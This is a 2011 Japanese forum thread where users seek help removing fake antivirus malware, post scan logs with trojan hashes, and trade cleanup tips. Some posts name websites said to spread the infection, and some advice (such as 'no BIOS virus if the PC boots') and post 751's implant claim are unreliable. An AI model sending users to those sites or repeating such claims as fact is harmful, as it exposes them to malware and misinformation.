ルートキットの多くがこの機能を持つ
攻撃者側のツールであり、また一般ユーザにとっては難解なhttp://hibari.2ch.net/test/read.cgi/software/1300289684/122
ウイルスでもある
こんな感じの理解でいいんじゃなかろうか
スマン
なぜか余計なURLが混じった無視してくれ
なぜか余計なURLが混じった無視してくれ
730 :名無しさん@お腹いっぱい。:2011/03/21(月) 13:44:59.20
Windows Diagnosticウイルスに感染してしまいました
http://geocities.yahoo.co.jp/gl/gbmogiki/view/20110313/1300080458
http://trojan-killer.net/windowsdiagnostic-scam-how-to-remove-windows-diagnostic-virus/windows-diagnostic-virus/?lang=ja
上記サイトを見て駆除ソフトも入れたのですが、駆除方法が分かりづらく
スキャン結果のところまでしか行きません
レジストリを書き換える作業などもあるようですが、そこが分かってない感じです
駆除方法を作業手順的に教えてください、お願いします
http://geocities.yahoo.co.jp/gl/gbmogiki/view/20110313/1300080458
http://trojan-killer.net/windowsdiagnostic-scam-how-to-remove-windows-diagnostic-virus/windows-diagnostic-virus/?lang=ja
上記サイトを見て駆除ソフトも入れたのですが、駆除方法が分かりづらく
スキャン結果のところまでしか行きません
レジストリを書き換える作業などもあるようですが、そこが分かってない感じです
駆除方法を作業手順的に教えてください、お願いします
731 :名無しさん@お腹いっぱい。:2011/03/21(月) 15:01:36.00
パソコン初心者です。疑問に思ったので質問です。
セキュリティソフトは悪質な情報収集プログラムと、正しい情報収集プログラムを
どうスパイウェアと区別をつけ、パソコンを守っているのですか?
セキュリティソフトは悪質な情報収集プログラムと、正しい情報収集プログラムを
どうスパイウェアと区別をつけ、パソコンを守っているのですか?
732 :名無しさん@お腹いっぱい。:2011/03/21(月) 15:32:49.80
簡単に言えばメーカーごとのデータベースに照らし合わせてる、データは日々更新されてアップデートという形でユーザーに送られてくる
データベースはメーカーごとに違うのでウイルスの名前が違ったり検出したりしなかったりもする
当然データベースに無い新種のウイルスには反応しない
データベースはメーカーごとに違うのでウイルスの名前が違ったり検出したりしなかったりもする
当然データベースに無い新種のウイルスには反応しない
733 :名無しさん@お腹いっぱい。:2011/03/21(月) 16:26:42.69
ウィルスに感染しないためには何に気をつければいいですか?
734 :名無しさん@お腹いっぱい。:2011/03/21(月) 16:42:45.86
735 :名無しさん@お腹いっぱい。:2011/03/21(月) 16:55:28.01
>>733
ウイルス対策ソフトを入れておくのはもちろんだが
↓セキュリティホールを塞ぐのが肝心だろう
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
ウイルス対策ソフトを入れておくのはもちろんだが
↓セキュリティホールを塞ぐのが肝心だろう
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
736 :名無しさん@お腹いっぱい。:2011/03/21(月) 17:49:55.85
ウィルスに詳しい方、
ウィルスが感染しうる場所を全て教えて欲しいです。
ウィルスが感染しうる場所を全て教えて欲しいです。
737 :名無しさん@お腹いっぱい。:2011/03/21(月) 17:58:52.03
あほか
738 :名無しさん@お腹いっぱい。:2011/03/21(月) 18:10:46.21
なぜルートキットは検出しにくいんですか?
739 :名無しさん@お腹いっぱい。:2011/03/21(月) 18:16:44.15
Windows以外のOSはウイルスの感染率がかなり低いそうですが、
何故ですか?
何故ですか?
740 :名無しさん@お腹いっぱい。:2011/03/21(月) 18:28:23.07
Trojan Killerって初めて見たな
効果あるのか?
効果あるのか?
741 :名無しさん@お腹いっぱい。:2011/03/21(月) 18:57:56.50
742 :名無しさん@お腹いっぱい。:2011/03/21(月) 19:16:10.27
>>734
まだ駆除出来てないようです。悪さをする本体は消えたようですが、
デスクトップを書き換えてる同ウイルスがスキャン結果をみるに後4つ残ってます
Windows Diagnosticウイルスの完全な駆除方法を教えてください。お願いします
まだ駆除出来てないようです。悪さをする本体は消えたようですが、
デスクトップを書き換えてる同ウイルスがスキャン結果をみるに後4つ残ってます
Windows Diagnosticウイルスの完全な駆除方法を教えてください。お願いします
743 :名無しさん@お腹いっぱい。:2011/03/21(月) 19:16:10.53
>>739
ほとんどのウイルスはwindows用だから
ほとんどのウイルスはwindows用だから
744 :名無しさん@お腹いっぱい。:2011/03/21(月) 19:21:21.04
スキャン結果の概要はこんな感じです
----- HKCR\TypeLib
----- HKCR\Interface
----- HKCR\Interface
----- HKCR\Interface
----- Desktop\windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
----- Microsoft\Windows\Start Menu\Programs\windows diagnostic\uninstall windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
----- Microsoft\Windows\Start Menu\Programs\windows diagnostic\windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
----- HKCR\TypeLib
----- HKCR\Interface
----- HKCR\Interface
----- HKCR\Interface
----- Desktop\windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
----- Microsoft\Windows\Start Menu\Programs\windows diagnostic\uninstall windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
----- Microsoft\Windows\Start Menu\Programs\windows diagnostic\windows diagnostic.lnk ---- General
fakeAVx.WindowsDiagnostic
745 :名無しさん@お腹いっぱい。:2011/03/21(月) 19:55:06.86
>>744
レジストリエントリが簡略化され過ぎて参考にならんが
ショートカットが残っているだけでウイルス本体はないようだがな
症状が出ていないならとりあえず問題ないと思うが
気になるなら起動時にF8連打で「セーフモードとネットワーク」を選択して
Malwarebytes' Anti-MalwareをDLしてスキャン
レジストリエントリが簡略化され過ぎて参考にならんが
ショートカットが残っているだけでウイルス本体はないようだがな
症状が出ていないならとりあえず問題ないと思うが
気になるなら起動時にF8連打で「セーフモードとネットワーク」を選択して
Malwarebytes' Anti-MalwareをDLしてスキャン
746 :名無しさん@お腹いっぱい。:2011/03/21(月) 23:20:37.35
BIOSにウィルスがいるかどうかはどうすれば分かりますか?
747 :名無しさん@お腹いっぱい。:2011/03/21(月) 23:31:05.86
PC起動するならいない
748 :名無しさん@お腹いっぱい。:2011/03/22(火) 00:30:16.97
----- C:\Windows\System32\tssfltc.dll ---- General
TR/Spy.Gen!L
ProdVer: 1, 2, 0, 0
FileVer: 1, 2, 7, 0
Name : tssfltc ダイナミック リンク ライブラリ
NAC: 15CC7DE2D6800B183AE460089132AC52:26
MD5: 6A78AB76747C546EAC23E526FE3302DB:45056
EP: 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 75 09 83 3D 74 94 00 10 00 EB 26 83 FE 01 74 05 83 FE 02 75 22 A1 58 82 00 10 85 C0 74 09 57 56 53 FF D0 85 C0 74 0C 57 56 53 E8 15 FF FF FF 85
SEC:
.text:4F94E4A0D94F9D8E11A218DDEE6620EA:20480
.rdata:D44D654292BB23C540644FB5B0875360:8192
.data:3E9BB232A1B0000BBD9D2DD81604D277:4096
.rsrc:1865EA368586F7F04CE89AD4AB9969E3:4096
.reloc:6774EBAACC6BB0B4671D380EDC20C262:4096
このトロイの木馬を駆除するにはどのようにすればいいのでしょうか?
TR/Spy.Gen!L
ProdVer: 1, 2, 0, 0
FileVer: 1, 2, 7, 0
Name : tssfltc ダイナミック リンク ライブラリ
NAC: 15CC7DE2D6800B183AE460089132AC52:26
MD5: 6A78AB76747C546EAC23E526FE3302DB:45056
EP: 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 75 09 83 3D 74 94 00 10 00 EB 26 83 FE 01 74 05 83 FE 02 75 22 A1 58 82 00 10 85 C0 74 09 57 56 53 FF D0 85 C0 74 0C 57 56 53 E8 15 FF FF FF 85
SEC:
.text:4F94E4A0D94F9D8E11A218DDEE6620EA:20480
.rdata:D44D654292BB23C540644FB5B0875360:8192
.data:3E9BB232A1B0000BBD9D2DD81604D277:4096
.rsrc:1865EA368586F7F04CE89AD4AB9969E3:4096
.reloc:6774EBAACC6BB0B4671D380EDC20C262:4096
このトロイの木馬を駆除するにはどのようにすればいいのでしょうか?
749 :名無しさん@お腹いっぱい。:2011/03/22(火) 00:43:10.92
>>748
削除できないファイルを強制削除!「Force Recycle Bin」
http://www.gigafree.net/utility/delete/forcerecyclebin.html
削除できないファイルを強制削除!「Force Recycle Bin」
http://www.gigafree.net/utility/delete/forcerecyclebin.html
750 :名無しさん@お腹いっぱい。:2011/03/23(水) 12:03:44.41
| | | | | | | | | | || | | | | | | | | |
| | | レ | | | | | J || | | | | | レ | | |
| | | J | | | し || | | | | | J | |
| レ | | レ| || J | | レ | | レ
J し | | || J J し |
| し J| |
J レ J
/V\
/◎;;;,;,,,,ヽ
_ ム::::(,,゚Д゚)::|
ヽツ.(ノ:::::::::.:::::::.:..|)
ヾソ:::::::::::::::::.:ノ
` ー U'"U'
| | | レ | | | | | J || | | | | | レ | | |
| | | J | | | し || | | | | | J | |
| レ | | レ| || J | | レ | | レ
J し | | || J J し |
| し J| |
J レ J
/V\
/◎;;;,;,,,,ヽ
_ ム::::(,,゚Д゚)::|
ヽツ.(ノ:::::::::.:::::::.:..|)
ヾソ:::::::::::::::::.:ノ
` ー U'"U'
751 :名無しさん@お腹いっぱい。:2011/03/24(木) 04:12:32.18
まだ報道されていない犯罪です。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。
752 :名無しさん@お腹いっぱい。:2011/03/25(金) 04:19:41.97
>>745
744とは別人なのですが、Malwarebyte使って駆除できました。ありがとうございます。
しかし、デスクトップのショートカットと、ドライブCの中身が空白になっていて、ソフトを起動できない状態です
使用領域は今までと変わっていなかったので、入れてたものが消えたわけでは無いと思うのですが
この症状はどうすれば治りますか?
お願いします
744とは別人なのですが、Malwarebyte使って駆除できました。ありがとうございます。
しかし、デスクトップのショートカットと、ドライブCの中身が空白になっていて、ソフトを起動できない状態です
使用領域は今までと変わっていなかったので、入れてたものが消えたわけでは無いと思うのですが
この症状はどうすれば治りますか?
お願いします
753 :名無しさん@お腹いっぱい。:2011/03/26(土) 12:27:30.08
>>752
>中身が空白になっていて
の意味が分からん、空白ってなんだ?
デスクトップのショートカットのアイコンがまったく表示されないうえ
操作もできないならOSが破壊された可能性もあるな
よくわからんが「Windows Diagnostic」以外にもウイルスに感染していて
Malwarebytes' Anti-Malwareが分離に失敗した、もしくは削除した影響かもしれん
ダメもとでセーフモードから「システムの復元」をするのも手だがリカバリが無難な気がする
まあ情報が少な過ぎるので偏った推測だが
>中身が空白になっていて
の意味が分からん、空白ってなんだ?
デスクトップのショートカットのアイコンがまったく表示されないうえ
操作もできないならOSが破壊された可能性もあるな
よくわからんが「Windows Diagnostic」以外にもウイルスに感染していて
Malwarebytes' Anti-Malwareが分離に失敗した、もしくは削除した影響かもしれん
ダメもとでセーフモードから「システムの復元」をするのも手だがリカバリが無難な気がする
まあ情報が少な過ぎるので偏った推測だが
754 :名無しさん@お腹いっぱい。:2011/03/26(土) 17:11:04.07
パソコンあまり詳しくないのですが、パソコンを立ち上げると"MS Removal Tool"というソフトが自動的にウィルスのスキャンを始めるのです。
そしてみつかったよ!早く保護しなきゃ!みたいな画面が出て、クレジットカードの番号などを入力する場面になります。
なにかウィルスに感染しているのでしょうか?
そしてみつかったよ!早く保護しなきゃ!みたいな画面が出て、クレジットカードの番号などを入力する場面になります。
なにかウィルスに感染しているのでしょうか?
755 :名無しさん@お腹いっぱい。:2011/03/26(土) 17:31:12.70
756 :名無しさん@お腹いっぱい。:2011/03/26(土) 17:42:42.84
ど、どうすればよいのでしょうか?
757 :名無しさん@お腹いっぱい。:2011/03/26(土) 18:10:20.85
758 :名無しさん@お腹いっぱい。:2011/03/26(土) 19:40:11.93
>>754
今同じ症状が出ているのですが、どのように事故解決したのか教えていただけませんでしょうか?
今同じ症状が出ているのですが、どのように事故解決したのか教えていただけませんでしょうか?
セーフモードからシステム復元
760 :名無しさん@お腹いっぱい。:2011/03/26(土) 19:54:54.16
Emsisoft Anti-Malware
ttp://www.gigafree.net/security/emsisoftantimalware.html
ウイルス、トロイの木馬、バックドア、ワーム、ボット、ダイヤラー、ハイジャッカー、キーロガー、
アドウェア、 偽アンチスパイウェア、各種リスクウェア 等の検出 / 削除 / 検疫 に対応しています。
ttp://www.gigafree.net/security/emsisoftantimalware.html
ウイルス、トロイの木馬、バックドア、ワーム、ボット、ダイヤラー、ハイジャッカー、キーロガー、
アドウェア、 偽アンチスパイウェア、各種リスクウェア 等の検出 / 削除 / 検疫 に対応しています。
761 :名無しさん@お腹いっぱい。:2011/03/26(土) 20:44:52.98
>>752
http://www.pc-master.jp/blog/trouble/2265.html
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1258244792
隠しファイルらしい
http://www.pc-master.jp/blog/trouble/2265.html
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1258244792
隠しファイルらしい
762 :名無しさん@お腹いっぱい。:2011/03/26(土) 22:07:37.59
763 :名無しさん@お腹いっぱい。:2011/03/27(日) 00:03:30.69
764 :名無しさん@お腹いっぱい。:2011/03/27(日) 19:01:24.60
俺もMS Removal Toolにやられた
NOD32が強制終了させられて何の役にも立たなかったよ!!!!
NOD32が強制終了させられて何の役にも立たなかったよ!!!!
765 :名無しさん@お腹いっぱい。:2011/03/27(日) 19:10:00.02
MS Removal Toolってどこに逝けば感染するんだ?
仮想で試したいから教えてよ
仮想で試したいから教えてよ
766 :764:2011/03/27(日) 19:26:58.08
追記しときます。
★質問用テンプレ★
【使用OS】 「WinXP Home SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 4」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの途中に、MS Removal ToolがESETを強制終了させた。
<MS Removal Toolについて>
【感染サイト】恥ずかしながら恐らく海外のサイト(hotfileなどのurlが羅列されている感じの)ではないかと推測。
上記サイト閲覧後に症状が出たので。。
【症状】@勝手にMS Removal Toolが起動し、コンピューターの検査を始める。
AあなたのPCはこれこれ数十個のウイルスに感染していますとの英語メッセージがでる。
BMS Removal Toolウィンドウを閉じようとしても閉じることができない。
CESETで検査している途中に、強制終了させられる。どのアプリケーションもブロックされ起動できない。
Dシステムの復元も起動できず焦ったが、再起動後すぐに復元を試みたらOKでした。
ESETが太刀打ちできないウイルスは初めてで焦った。。
データの流出などないか心配です。
★質問用テンプレ★
【使用OS】 「WinXP Home SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 4」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの途中に、MS Removal ToolがESETを強制終了させた。
<MS Removal Toolについて>
【感染サイト】恥ずかしながら恐らく海外のサイト(hotfileなどのurlが羅列されている感じの)ではないかと推測。
上記サイト閲覧後に症状が出たので。。
【症状】@勝手にMS Removal Toolが起動し、コンピューターの検査を始める。
AあなたのPCはこれこれ数十個のウイルスに感染していますとの英語メッセージがでる。
BMS Removal Toolウィンドウを閉じようとしても閉じることができない。
CESETで検査している途中に、強制終了させられる。どのアプリケーションもブロックされ起動できない。
Dシステムの復元も起動できず焦ったが、再起動後すぐに復元を試みたらOKでした。
ESETが太刀打ちできないウイルスは初めてで焦った。。
データの流出などないか心配です。
767 :名無しさん@お腹いっぱい。:2011/03/27(日) 20:09:05.55
システムの復元じゃウイルス本体はどこかに残ったままなんだがな・・・
とりあえず復元後はフルスキャンが無難
できれば可能な限りリカバリを薦めるが
システムの復元に関する注意点、リスク
ttp://www.higaitaisaku.com/fukugen.html
とりあえず復元後はフルスキャンが無難
できれば可能な限りリカバリを薦めるが
システムの復元に関する注意点、リスク
ttp://www.higaitaisaku.com/fukugen.html
768 :名無しさん@お腹いっぱい。:2011/03/27(日) 20:37:52.46
MS Removal Toolウィルスバスターのスキャンじゃ検出できなかったな
プロセスみるとうちではk〜てプロセスで動いてた
プロセスみるとうちではk〜てプロセスで動いてた
769 :名無しさん@お腹いっぱい。:2011/03/27(日) 20:47:55.05
>>767
>システムの復元じゃウイルス本体はどこかに残ったままなんだがな・・・
マジですか!?
いま、ESETで検査終わったが未検出
対応できなかったから当たり前といえば当たり前か。。
現在Spybotをインストールして検査中。
>システムの復元じゃウイルス本体はどこかに残ったままなんだがな・・・
マジですか!?
いま、ESETで検査終わったが未検出
対応できなかったから当たり前といえば当たり前か。。
現在Spybotをインストールして検査中。
770 :名無しさん@お腹いっぱい。:2011/03/27(日) 21:03:58.17
システム復元ってのがオフになってた場合、どうすればいいの?
771 :名無しさん@お腹いっぱい。:2011/03/27(日) 21:09:06.66
>>769
自分で実行しない限りは問題ないだろうがな
スキャンするなら自分はMalwarebytes' Anti-Malwareを薦める
あとMS Removal Toolでググると昨日に比べてヒット率が増えている
最近流行りだしたウイルスのようだから駆除できるかわからんな
自分で実行しない限りは問題ないだろうがな
スキャンするなら自分はMalwarebytes' Anti-Malwareを薦める
あとMS Removal Toolでググると昨日に比べてヒット率が増えている
最近流行りだしたウイルスのようだから駆除できるかわからんな
772 :名無しさん@お腹いっぱい。:2011/03/27(日) 21:18:31.32
>>770
PC詳しいなら手動で
ttp://deletemalware.blogspot.com/2011/03/how-to-remove-ms-removal-tool-uninstall.html
PC詳しいなら手動で
ttp://deletemalware.blogspot.com/2011/03/how-to-remove-ms-removal-tool-uninstall.html
773 :名無しさん@お腹いっぱい。:2011/03/27(日) 21:30:50.94
MS Removal Toolまじ怖いわw
システムの復元だけで今直ったが 自ら駆除はむずかしいのかね
システムの復元だけで今直ったが 自ら駆除はむずかしいのかね
774 :770:2011/03/27(日) 21:31:56.89
http://oshiete1.watch.impress.co.jp/qa4133387.html
Malwarebytes.orgMalwarebytes' Anti-Malware
http://www.malwarebytes.org/mbam.php
1.起動後「Update」タブをクリック
2.「Check for updates」ボタンをクリック
3.「Scanner」タブをクリック
4.「Perform quick scan」(初期設定)を選択
5.「Scan」ボタンをクリック
6.スキャン終了後「Show Results」をクリック
7.全項目にチェックが入っているのを確認して「Remove Selected」をクリック
駆除終了後スキャンログが表示されます。
をやってみる。
Malwarebytes.orgMalwarebytes' Anti-Malware
http://www.malwarebytes.org/mbam.php
1.起動後「Update」タブをクリック
2.「Check for updates」ボタンをクリック
3.「Scanner」タブをクリック
4.「Perform quick scan」(初期設定)を選択
5.「Scan」ボタンをクリック
6.スキャン終了後「Show Results」をクリック
7.全項目にチェックが入っているのを確認して「Remove Selected」をクリック
駆除終了後スキャンログが表示されます。
をやってみる。
775 :名無しさん@お腹いっぱい。:2011/03/27(日) 21:36:52.11
HijackThisとか使ってスタートアップを削除すれば大抵のマルウェアは止められるんじゃね?
777 :770:2011/03/27(日) 21:40:56.47
778 :770:2011/03/27(日) 21:58:34.55
何とか駆除できたみたいだけど、今度は起動後のタスクトレイの常時アイコンが
表示されるまでがかなり時間かかる。重い。
表示されるまでがかなり時間かかる。重い。
779 :名無しさん@お腹いっぱい。:2011/03/27(日) 22:00:42.83
780 :770:2011/03/27(日) 22:05:23.38
781 :名無しさん@お腹いっぱい。:2011/03/27(日) 22:35:51.20
>>780
hostsいじられてたりブラウザのプロキシ欄を勝手に書き換えられてたりしてないか?
ttp://www.higaitaisaku.com/hosts.html
>>772 と比べてサービスのレジストリとsystem32のファイルも検出しているのが気になる
亜種か他のウイルスに感染していたりするのかもしれん
hostsいじられてたりブラウザのプロキシ欄を勝手に書き換えられてたりしてないか?
ttp://www.higaitaisaku.com/hosts.html
>>772 と比べてサービスのレジストリとsystem32のファイルも検出しているのが気になる
亜種か他のウイルスに感染していたりするのかもしれん
782 :名無しさん@お腹いっぱい。:2011/03/27(日) 22:41:10.05
>>781
調べてみる。サンクス。ちなみにおたくはグーグルだけ重くない?他のみんなもどう?俺はグーグルだけ重い。
それよりも気になるのがタスクトレイ。起動後に速攻でタスクマネージャで監視したけど、今1つはっきりとわからない。
調べてみる。サンクス。ちなみにおたくはグーグルだけ重くない?他のみんなもどう?俺はグーグルだけ重い。
それよりも気になるのがタスクトレイ。起動後に速攻でタスクマネージャで監視したけど、今1つはっきりとわからない。
783 :770:2011/03/27(日) 22:47:01.47
テキスや電卓起動するだけで時間かかる・・・おかしいぞこれは。
784 : ◆N9P3SuvBPo :2011/03/27(日) 22:55:10.12
>783
もろウイルスによる後遺症なので、リカバリしたほうが手っ取り早いです。
googleは俺は全然重くない。
もろウイルスによる後遺症なので、リカバリしたほうが手っ取り早いです。
googleは俺は全然重くない。
>>783
Google特に重くはないな
それよりsystem32のdup.sysでこんなのが引っかかったぞ
ttp://www.greatis.com/appdata/d/d/dup.sys.htm
これは今日の記事のようだからMS Removal Toolが呼び寄せるのかもしれないな
そうだとすると未知のウイルスが潜んでいる可能性もある
Google特に重くはないな
それよりsystem32のdup.sysでこんなのが引っかかったぞ
ttp://www.greatis.com/appdata/d/d/dup.sys.htm
これは今日の記事のようだからMS Removal Toolが呼び寄せるのかもしれないな
そうだとすると未知のウイルスが潜んでいる可能性もある
786 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:04:46.01
787 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:08:32.66
俺もMS Removal Toolにやられた、壁紙が青色になるし精神衛生上悪いw
海外サイトでやられたっぽいが、IEじゃなくfiirefoxでも喰らうみたいだ
タスクマネージャからプロセス中断したらとりあえず止まったけど、再起動したらまた同じことの繰り返し
Aviraも対応してないみたいだしシステム復元すべきか
海外サイトでやられたっぽいが、IEじゃなくfiirefoxでも喰らうみたいだ
タスクマネージャからプロセス中断したらとりあえず止まったけど、再起動したらまた同じことの繰り返し
Aviraも対応してないみたいだしシステム復元すべきか
788 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:10:32.31
789 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:14:56.55
790 :770:2011/03/27(日) 23:17:16.03
起動時のタスクトレイや色んなソフトの起動が遅いというのはシステム的なものかと思うが、
なんでグーグルの検索の時だけ重いんだ。理解できない。ちなみにageたりsageすまん。名前入れ忘れたりしてるだけ。
なんでグーグルの検索の時だけ重いんだ。理解できない。ちなみにageたりsageすまん。名前入れ忘れたりしてるだけ。
791 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:19:00.74
792 : ◆N9P3SuvBPo :2011/03/27(日) 23:24:25.13
>790
感染前はgoogle検索は重かったですか?
感染前はgoogle検索は重かったですか?
793 :770:2011/03/27(日) 23:25:04.01
グーグルだけ遅い でぐぐると、IPv6を切ればいいと出たが、大丈夫なのか・・・
794 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:29:13.49
今日windowsrepairってのにやられた ↓これな
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1458642934
avast飛び越えてきたわ
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1458642934
avast飛び越えてきたわ
795 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:36:05.05
八頭様を呼べ!八頭様なら!
796 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:39:20.86
この手のマルウェア大流行か・・・
駆除できたらFlash Player、Adobe Reader、JAVAくらいはアップデートしておけよ >>763
駆除できたらFlash Player、Adobe Reader、JAVAくらいはアップデートしておけよ >>763
797 :名無しさん@お腹いっぱい。:2011/03/27(日) 23:40:58.90
みんなどこで感染してるの?w
798 :770:2011/03/28(月) 00:03:58.08
http://flets.com/customer/ipv6_setting.html#xp
をインストールすれば、まったく検索結果が出てこない状態よりは回復して、
ほんの数秒タイムラグはあるけど検索結果は出てくるようにはなった。
をインストールすれば、まったく検索結果が出てこない状態よりは回復して、
ほんの数秒タイムラグはあるけど検索結果は出てくるようにはなった。
800 :名無しさん@お腹いっぱい。:2011/03/28(月) 05:19:37.79
MS Removal Toolってなんだよハゲ
即効検索したが新種かよ
マジ作った外人殺したい
即効検索したが新種かよ
マジ作った外人殺したい
801 :名無しさん@お腹いっぱい。:2011/03/28(月) 05:21:55.62
Windowsrepairてのは以前からあるマルウェア?
MS Removal Toolが新種?
報告あるウィルス対策メーカーないんだろうか
MS Removal Toolが新種?
報告あるウィルス対策メーカーないんだろうか
802 :名無しさん@お腹いっぱい。:2011/03/28(月) 07:44:54.83
>>797
yourfileでニューハーフ動画開いた瞬間にガード全部飛び越えて入ってきやがったwww
yourfileでニューハーフ動画開いた瞬間にガード全部飛び越えて入ってきやがったwww
803 :名無しさん@お腹いっぱい。:2011/03/28(月) 08:16:38.52
804 :名無しさん@お腹いっぱい。:2011/03/28(月) 08:38:01.78
一応動くようにはなったけど、システムの復元だけじゃ駄目なのか。
805 :名無しさん@お腹いっぱい。:2011/03/28(月) 13:49:00.13
MS Removal Toolうぜえwww
806 :名無しさん@お腹いっぱい。:2011/03/28(月) 16:59:50.43
僕もYour File Hostでおかず探してたらなりましたw
807 :名無しさん@お腹いっぱい。:2011/03/28(月) 19:21:26.04
>>804
俺はシステムの復元のあとMicrosoft Security Essentialsでスキャンってかたちで様子見してる
もう少し新しい定義が出たら改めてスキャンして、さらに様子見の予定
・・・これでどうにかなってほしいなぁって希望をこめて
俺はシステムの復元のあとMicrosoft Security Essentialsでスキャンってかたちで様子見してる
もう少し新しい定義が出たら改めてスキャンして、さらに様子見の予定
・・・これでどうにかなってほしいなぁって希望をこめて
808 :名無しさん@お腹いっぱい。:2011/03/28(月) 19:29:33.83
実際に問題があるURLが一向に晒されないな・・・
誰かYour File Hostでも何でもいいから「MS Removal Tool」が仕込まれた所を探してくれ
俺はセキュリティや復帰に自信が無いから遠慮するけど
誰かYour File Hostでも何でもいいから「MS Removal Tool」が仕込まれた所を探してくれ
俺はセキュリティや復帰に自信が無いから遠慮するけど
809 :名無しさん@お腹いっぱい。:2011/03/28(月) 19:41:19.29
ポップアップ禁止にしてたら感染しないあれだろ
810 :名無しさん@お腹いっぱい。:2011/03/28(月) 19:43:48.06
特定のサイトじゃなく、サイト内の広告から飛ばされてるんじゃ?
たしか少し前に国内でもそういうのなかったっけ?
たしか少し前に国内でもそういうのなかったっけ?
811 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:21:39.79
YourFileHost自体がハックされたの?
それとも広告見たら勝手に飛ばされるとか、偽再生ボタンを誤クリック系なのだろうか?
いや今の状況でYourFileHostにアクセスしようと思わないけど・・・
それとも広告見たら勝手に飛ばされるとか、偽再生ボタンを誤クリック系なのだろうか?
いや今の状況でYourFileHostにアクセスしようと思わないけど・・・
812 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:22:23.36
感染源複数あるみたい
813 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:23:16.12
広告系でしょ
前からポップアップ→偽ウイルスソフト仕込みはあった
対応できてなかったのなら亜種なんじゃない
前からポップアップ→偽ウイルスソフト仕込みはあった
対応できてなかったのなら亜種なんじゃない
814 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:33:09.26
システム復元してからMalwarebytes' Anti-Malwareでスキャンしたらいくつかでてきた
ポップアップ形だと思う
ポップアップ形だと思う
815 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:39:34.56
普段からどんなサイト見てるんだよw
816 :名無しさん@お腹いっぱい。:2011/03/28(月) 20:46:04.81
↓このサイトでMS Removal Toolくらいました
://www.cover-land.net/
://www.cover-land.net/
817 :名無しさん@お腹いっぱい。:2011/03/28(月) 21:00:40.00
>>816
とりあえずブラクラチェッカーに放り込んでみた
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.cover-land.net%2F&x=23&y=18
外部接続の中に何かヤバそうな要素はあるかな?
とりあえずブラクラチェッカーに放り込んでみた
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.cover-land.net%2F&x=23&y=18
外部接続の中に何かヤバそうな要素はあるかな?
818 :名無しさん@お腹いっぱい。:2011/03/28(月) 21:15:16.19
819 :名無しさん@お腹いっぱい。:2011/03/28(月) 21:16:31.89
>>816
そういえばjavaが起動したなw
そういえばjavaが起動したなw
820 :名無しさん@お腹いっぱい。:2011/03/28(月) 21:18:19.39
821 :名無しさん@お腹いっぱい。:2011/03/28(月) 21:20:35.37
少しずつ知られてきたっぽい
ベースが海外サイトで日本語訳がぎこちないが
MSの削除ツール ? 詐欺. 方法のMSの削除ツール偽のアンチウイルスを削除するには
3月 28, 2011
http://trojan-killer.net/ms-removal-tool-scam-how-to-remove-ms-removal-tool-fake-anti-virus/?lang=ja
ベースが海外サイトで日本語訳がぎこちないが
MSの削除ツール ? 詐欺. 方法のMSの削除ツール偽のアンチウイルスを削除するには
3月 28, 2011
http://trojan-killer.net/ms-removal-tool-scam-how-to-remove-ms-removal-tool-fake-anti-virus/?lang=ja
822 :名無しさん@お腹いっぱい。:2011/03/29(火) 02:09:13.99
www.sukebelinks.com/
俺はここで紹介されているサイトをいろいろ見ているうちに感染した。
Malwarebytes' Anti-Malwareを使ってとりあえず落ち着いたが
上の人と同じでソフトの起動に時間がかかるのとgoogleの検索だけが重い症状が残っている。
どうすればいいんだ。osはvista
俺はここで紹介されているサイトをいろいろ見ているうちに感染した。
Malwarebytes' Anti-Malwareを使ってとりあえず落ち着いたが
上の人と同じでソフトの起動に時間がかかるのとgoogleの検索だけが重い症状が残っている。
どうすればいいんだ。osはvista
823 :名無しさん@お腹いっぱい。:2011/03/29(火) 02:33:24.11
後遺症出る人もいるんだな
俺の場合システム復元だけでまともになったのは運がよかったのか?
